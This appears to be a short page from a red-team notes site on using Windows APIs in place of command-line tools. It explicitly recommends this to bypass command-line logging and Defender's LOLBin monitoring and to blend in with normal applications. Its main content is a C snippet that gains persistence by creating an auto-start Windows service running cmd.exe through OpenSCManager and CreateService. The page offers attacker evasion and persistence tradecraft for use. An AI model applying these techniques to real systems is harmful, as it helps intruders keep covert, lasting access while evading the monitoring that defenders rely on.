Benefits of Using APIs

WinApis are generally better than using commands to execute code or to gather info. The Pros of using APIs are:

Bypass command line logging(Defender may look specifically at LOLBins)
Confuse our activity with regular applications
May have additional functionality or for compatibility reasons

Here are some code snippets of using APIs for persistence:

Service Creation

SC_HANDLE hManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
SC_HANDLE service = CreateService(
    hManager,
    "ServiceName",
    "Display Name",
    GENERIC_READ | GENERIC_EXECUTE,
    SERVICE_WIN32_OWN_PROCESS,
    SERVICE_AUTO_START,
    SERVICE_ERROR_IGNORE,
    "C:\\Windows\\System32\\cmd.exe",
    NULL, NULL, NULL, NULL, NULL
);

PreviousPivoting NextThread-less Payload Execution

Last updated 3 years ago

Was this helpful?